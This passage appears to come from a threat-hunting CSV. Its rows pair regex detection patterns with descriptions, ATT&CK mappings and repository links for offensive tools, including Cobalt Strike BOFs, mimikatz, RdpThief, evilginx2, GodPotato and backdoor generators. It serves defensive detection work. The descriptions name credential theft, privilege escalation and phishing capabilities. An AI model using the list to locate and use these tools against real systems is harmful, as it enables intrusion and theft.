- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*BeaconPrintf*",".{0,1000}BeaconPrintf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 
- Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconPrintToStreamW*",".{0,1000}BeaconPrintToStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconTool -*",".{0,1000}BeaconTool\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconTool -i online_info.txt -aes decrypt*",".{0,1000}BeaconTool\s\-i\sonline_info\.txt\s\-aes\sdecrypt.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconTool/lib/sleep.jar*",".{0,1000}BeaconTool\/lib\/sleep\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" 
"*BeaconUseToken*",".{0,1000}BeaconUseToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*Beau Bullock (@dafthack)*",".{0,1000}Beau\sBullock\s\(\@dafthack\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*",".{0,1000}beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a*",".{0,1000}beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BEB67A6E-4C54-4DE5-8C6B-2C12F44A7B92*",".{0,1000}BEB67A6E\-4C54\-4DE5\-8C6B\-2C12F44A7B92.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592*",".{0,1000}beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90*",".{0,1000}bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2*",".{0,1000}bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*beef:beef*",".{0,1000}beef\:beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind_tcp-stage.asm*",".{0,1000}beef_bind_tcp\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind_tcp-stager.asm*",".{0,1000}beef_bind_tcp\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stage*.rb*",".{0,1000}beef_bind\-stage.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stage.asm*",".{0,1000}beef_bind\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stager.asm*",".{0,1000}beef_bind\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_test.rb*",".{0,1000}beef_test\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beefproject*",".{0,1000}beefproject.{0,1000}","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef-xss*",".{0,1000}beef\-xss.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Beelogger*",".{0,1000}Beelogger.{0,1000}","offensive_tool_keyword","BeeLogger","Keylogger generator. 
fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","974","321","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z" "*BeetleChunks/SpoolSploit*",".{0,1000}BeetleChunks\/SpoolSploit.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*before-create-implant-callback*",".{0,1000}before\-create\-implant\-callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*before-create-implant-io-bin*",".{0,1000}before\-create\-implant\-io\-bin.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*before-find-implant-chunks*",".{0,1000}before\-find\-implant\-chunks.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" 
"*BeichenDream/GodPotato*",".{0,1000}BeichenDream\/GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*BeichenDream/SharpToken*",".{0,1000}BeichenDream\/SharpToken.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*Ben0xA/DoUCMe*",".{0,1000}Ben0xA\/DoUCMe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*benjamin@gentilkiwi.com*",".{0,1000}benjamin\@gentilkiwi\.com.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*beRoot.exe -*",".{0,1000}beRoot\.exe\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*beroot.py -*",".{0,1000}beroot\.py\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*BeRoot-master*",".{0,1000}BeRoot\-master.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*berzerk0*",".{0,1000}berzerk0.{0,1000}","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*besimorhino/powercat*",".{0,1000}besimorhino\/powercat.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*BesoToken.exe list*",".{0,1000}BesoToken\.exe\slist.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive 
sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*BesoToken-master*",".{0,1000}BesoToken\-master.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*best*phish her*",".{0,1000}best.{0,1000}phish\sher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*bestcrypt2john.py*",".{0,1000}bestcrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bestcryptve2john.py*",".{0,1000}bestcryptve2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*BetterBackdoor*",".{0,1000}BetterBackdoor.{0,1000}","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation 
